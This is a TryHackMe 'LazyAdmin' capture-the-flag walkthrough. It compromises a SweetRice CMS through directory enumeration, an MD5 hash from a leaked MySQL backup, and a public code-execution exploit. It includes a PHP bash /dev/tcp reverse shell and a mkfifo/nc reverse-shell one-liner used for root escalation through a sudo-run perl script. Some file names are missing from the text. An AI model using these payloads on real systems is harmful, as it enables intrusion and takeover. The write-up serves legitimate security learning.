TryHackMe: LazyAdmin

7 min readJul 13, 2020



  1. Port Scan
nmap -Pn <ip>

There’re 2 ports: 22 and 80.

2. OS and services scan

nmap -A -p 22,80 <ip>

3. Access HTTP site

Nothing much.

View page source, nothing much.

4. Scan directory with gobuster.

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi

There’s a “/content” directory.

5. Access “/content”

It’s CMS SweetRice. Noting much here.

View page source. Noting much.

Inspect element, there’s cookie named “sweetrice”.

6. Further enumeration in “/content”.

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi

Access “/images/”

Access “/license.txt”

Access “/js/”

Access “/changelog.txt”

It’s version 1.5.0

Access “/inc”

There’re interesting file and directories: cache, lastest.txt, and mysql_backup.

Access “/inc/cache/”

There’s file named “cache.db”.

Download it

wget http://<ip>/content/inc/cache/cache.db

Read the file

cat cache.db

Not much useful.

Access “/inc/lastest.txt”

Seems like this CMS is 1.5.1. Now, there’re 2 possibility of version number: 1.5.0 and 1.5.1.

Access “/inc/mysql_backup”

There’s file.

Download it.


Read the file.

I have to adjust the lines in file for easier viewing.

Seems like there’re some credentials.

Let’s crack the md5 hash with crackstation.

It’s Password123.

My guess:

admin: Password123manager: Password123

Access “/as”

Now I found admin panel.

Let’s login with guessed credentials.



Try another one



Let’s continue directory enumeration

Access “/_themes” , there’s “default” directory.

Access “/_themes/default/”, nothing much

Access “/attachment”, nothing much


  1. Search for exploits
searchsploit sweetrice

There’s code execution.

2. Copy and read

searchsploit -m 40700

Read the file.

Seems like I have to access admin panel -> Ads section

This seems like the result of an exploit.

3. Test the exploit

Back to admin panel -> Ads section. This section may be exploited following the exploit document/script.

Let’s change the IP and path in the code first.

Copy and paste the code. Click done.

Nothing happens. Seems like I need Ads name.

Let’s read the code again. The underlined strings “hacked” may be connected.

Try to add the code again, this time I will input Ads name as “hacked”.


I edit the path in the code to remind myself.

Let’s access “/content/inc”. There’s new directory, “ads”.

There’s a file, “hacked.php”.

Access it. Seems like the exploit is successful.

4. Get reverse shell

Create listener

nc -lvp 1234

Create php reverse shell

<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");?> 

Copy and paste it in the code. I also change the value to be “shell”.

Let’s create the exploit file in admin panel.

Now I have shell file in “/content/inc/ads”.

Access it.

Now I have reverse shell.

5. Let’s explore the machine


I’m www-data.

cd /homels cd itguylscat user.txt
cat mysql_login.txt

It’s perl script and call “/sh”.

[Privilege Escalation]

  1. Verify sudo rights.
sudo -l

Since “” call “sh” to have a shell and I can run perl with sudo privilege. Maybe I can have root access with both of them.

sudo /usr/bin/perl /home/itguy/

Failed. The machine is crashed. I have to stop the shell and redo the step of getting reverse shell again.

Let’s give another try.

This time I have to read it more clearly.


There’s “/etc/”.

Read it

cat /etc/

It’s a reverse shell to some machine.

Prepare the command by copying it, change IP and port number.

Replace the old script

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1236 >/tmp/f" > /etc/

Verify the script

cat /etc/

2. Let’s exploit

Create another listener

nc -lvp 1236

Run the command

sudo /usr/bin/perl /home/itguy/

Back to reverse shell, I have to wait a while til I get the shell.


Now I’m root.

cd /rootlscat root.txt



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